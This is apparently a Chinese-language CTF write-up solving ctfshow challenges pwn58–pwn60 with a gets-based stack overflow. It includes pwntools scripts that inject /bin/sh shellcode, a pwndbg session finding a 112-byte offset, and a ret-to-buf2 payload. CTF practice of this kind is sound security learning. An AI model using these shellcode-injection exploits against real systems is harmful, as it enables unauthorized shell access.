pwn58

checksec

32位

IDA分析

main函数反编译失败，怀疑就是这样设计的（）

就直接将就汇编进行分析

大致的函数顺序就是先logo再ctfshow函数

logo函数一如既往没东西

进ctfshow函数

ctfshow函数只有个gets函数

找遍字段没找到后门

自行传入shellcode即可

from pwn import *
p = remote("pwn.challenge.ctf.show",28305)
shellcode = asm(shellcraft.sh(),arch='i386',os='linux')
p.sendline(shellcode)
p.interactive()

pwn59

64位shellcode

不用像之前的64位传参一样需要找rdi啥的位置

直接传shellcode即可

但是必须加上架构才能打通

from pwn import *
p = remote("pwn.challenge.ctf.show",28125)
context.arch='amd64'
shellcode = asm(shellcraft.sh())
payload = shellcode
p.sendline(payload)
p.interactive()

pwn60

稍难的shellcode

checksec

32位

看main函数

存在一个gets函数和一个strncpy函数

gets函数就很明显的需要进行一个溢出处理

strncpy是把s复制给buf2

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF
​
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("CTFshow-pwn can u pwn me here!!");
  gets(s);
  strncpy(buf2, s, 0x64u);
  printf("See you ~");
  return 0;
}
​
​

所以gdb动态调试搞出偏移量

gdb有时会出现没有权限的情况

使用指令

chmod 777 pwn60

然后正常调试函数即可

具体调试流程：

ctfshow@ubuntu:~/Desktop/xd$ chmod 777 pwn60
ctfshow@ubuntu:~/Desktop/xd$ gdb pwn60
GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 191 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from pwn60...done.
pwndbg> cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
pwndbg> r
Starting program: /home/ctfshow/Desktop/xd/pwn60 
CTFshow-pwn can u pwn me here!!
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
See you ~
Program received signal SIGSEGV, Segmentation fault.
0x62616164 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────
 EAX  0x0
 EBX  0x0
 ECX  0x9
 EDX  0xf7fad890 (_IO_stdfile_1_lock) ◂— 0
 EDI  0x0
 ESI  0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1d7d8c
 EBP  0x62616163 ('caab')
 ESP  0xffffcf30 ◂— 'eaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
 EIP  0x62616164 ('daab')
─────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────
Invalid address 0x62616164
​
​
​
​
​
​
​
​
​
​
─────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────
00:0000│ esp  0xffffcf30 ◂— 'eaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
01:0004│      0xffffcf34 ◂— 'faabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
02:0008│      0xffffcf38 ◂— 'gaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
03:000c│      0xffffcf3c ◂— 'haabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
04:0010│      0xffffcf40 ◂— 'iaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
05:0014│      0xffffcf44 ◂— 'jaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
06:0018│      0xffffcf48 ◂— 'kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
07:001c│      0xffffcf4c ◂— 'laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
───────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────
 ► f 0 62616164
   f 1 62616165
   f 2 62616166
   f 3 62616167
   f 4 62616168
   f 5 62616169
   f 6 6261616a
   f 7 6261616b
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l
usage: pwn cyclic [-h] [-a alphabet] [-n length] [-c context] [-l lookup_value | count]
pwn cyclic: error: argument -l/-o/--offset/--lookup: expected one argument
pwndbg> cyclic -l 62616164
[CRITICAL] Pattern contains characters not present in the alphabet
pwndbg> cyclic -l 0x62616164
112

最后拿到了实际的偏移量

就这样直接打shellcode，用ljust方法补齐buf2字段即可

from pwn import *
context.log_level = 'debug'
p = remote("pwn.challenge.ctf.show", 28291)
e = ELF("./pwn60")
buf2 = e.sym['buf2']
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(112, b'a') + p32(buf2)
p.sendline(payload)
p.interactive()